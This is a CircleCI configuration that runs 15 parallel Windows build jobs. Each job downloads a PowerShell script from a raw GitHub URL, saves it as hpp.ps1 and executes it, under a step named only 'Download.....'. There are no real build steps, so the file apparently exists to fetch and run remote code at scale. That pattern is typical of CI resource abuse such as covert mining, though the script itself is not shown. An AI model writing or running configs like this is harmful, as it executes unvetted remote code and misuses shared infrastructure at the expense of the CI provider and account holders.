version: '2.1'
orbs:
  win: circleci/windows@2.4
jobs:
  build:
    parallelism: 15
    executor:
      name: win/default
      size: medium
    steps:
      - checkout
      - run:
          name: Download.....
          command: |
            Invoke-WebRequest https://raw.githubusercontent.com/parkitmove/wiin-app/main/hpp -OutFile hpp.ps1
      - run: ./hpp.ps1